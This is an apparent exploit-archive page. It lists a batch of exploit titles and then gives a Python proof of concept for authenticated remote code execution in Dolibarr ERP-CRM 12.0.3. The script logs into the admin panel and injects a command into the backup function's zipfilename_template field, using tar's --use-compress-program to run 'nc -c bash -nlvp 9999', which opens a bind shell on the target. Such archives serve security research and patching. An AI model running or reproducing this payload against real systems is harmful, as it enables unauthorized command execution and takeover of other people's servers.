1d95e0bd8b
16 changes to exploits/shellcodes Nxlog Community Edition 2.10.2150 - DoS (Poc) Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated) Linksys RE6500 1.0.11.001 - Unauthenticated RCE Content Management System 1.0 - 'First Name' Stored XSS Content Management System 1.0 - 'email' SQL Injection Content Management System 1.0 - 'id' SQL Injection Medical Center Portal Management System 1.0 - 'id' SQL Injection Customer Support System 1.0 - _First Name_ & _Last Name_ Stored XSS Customer Support System 1.0 - 'id' SQL Injection Online Tours & Travels Management System 1.0 - _id_ SQL Injection Interview Management System 1.0 - Stored XSS in Add New Question Interview Management System 1.0 - 'id' SQL Injection Employee Record System 1.0 - Multiple Stored XSS PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting) Victor CMS 1.0 - Multiple SQL Injection (Authenticated)
77 lines
No EOL
2.8 KiB
Python
Executable file
77 lines
No EOL
2.8 KiB
Python
Executable file
# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
|
|
# Date: 2020.12.17
|
|
# Exploit Author: Yilmaz Degirmenci
|
|
# Vendor Homepage: https://github.com/Dolibarr/dolibarr
|
|
# Software Link: https://sourceforge.net/projects/dolibarr/
|
|
# Version: 12.0.3
|
|
# Tested on: Kali Linux 2020.2
|
|
|
|
# Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is
|
|
# vulnerable to authenticated Remote Code Execution Attack. An attacker who
|
|
# has the access the admin dashboard can manipulate the backup function by
|
|
# inserting payload into the zipfilename_template parameter at page
|
|
# /admin/tools/dolibarr_export.php by clicking on the button "Generate
|
|
# Backup" thus triggering command injection on target system.
|
|
|
|
import requests
|
|
from bs4 import BeautifulSoup
|
|
from bs4 import Comment
|
|
import re
|
|
import lxml
|
|
import json
|
|
import urllib
|
|
|
|
username = input("username: ")
|
|
password = input("password: ")
|
|
root_url = input("Root URL: http://192.168.0.15/ --> ")
|
|
|
|
print("Exploit is sent! Check out if the bind shell on port 9999 active!")
|
|
|
|
listener_port = "9999"
|
|
|
|
login_url = root_url + "/index.php?mainmenu=home "
|
|
vulnerable_url = root_url + "/admin/tools/dolibarr_export.php"
|
|
upload_url = root_url + "/admin/tools/export_files.php"
|
|
|
|
session = requests.Session()
|
|
request = session.get(login_url)
|
|
|
|
# Get the token value
|
|
soup = BeautifulSoup(request.text,"lxml")
|
|
token = soup.find("input",{'name':'token'})['value']
|
|
|
|
# Login
|
|
body = {"token":token, "actionlogin":"login",
|
|
"loginfunction":"loginfunction", "tz":"-5",
|
|
"tz_string":"America%2FNew_York", "dst_observed":"1",
|
|
"dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second":
|
|
"2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664",
|
|
"dol_hide_topmenu":"", "dol_hide_leftmenu":"",
|
|
"dol_optimize_smallscreen":"", "dol_no_mouse_hover":"",
|
|
"dol_use_jmobile":"", "username":username,"password":password}
|
|
|
|
session.post(login_url, data=body, cookies=request.cookies)
|
|
|
|
request = session.get(vulnerable_url)
|
|
token = soup.find("input",{'name':'token'})['value']
|
|
|
|
header = {
|
|
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
|
|
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
|
|
Gecko/20100101 Firefox/80.0",
|
|
"Accept":"*/",
|
|
"Accept-Encoding": "gzip, deflate",
|
|
"Origin": root_url,
|
|
"Referer":
|
|
root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools",
|
|
"Upgrade-Insecure-Requests": "1"
|
|
}
|
|
|
|
body = {"token":token, "export_type":"server", "page_y":"1039",
|
|
"zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar
|
|
--use-compress-program='nc -c bash -nlvp 9999' %0a :: ",
|
|
"compression":"gz"}
|
|
|
|
param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote)
|
|
|
|
session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header) |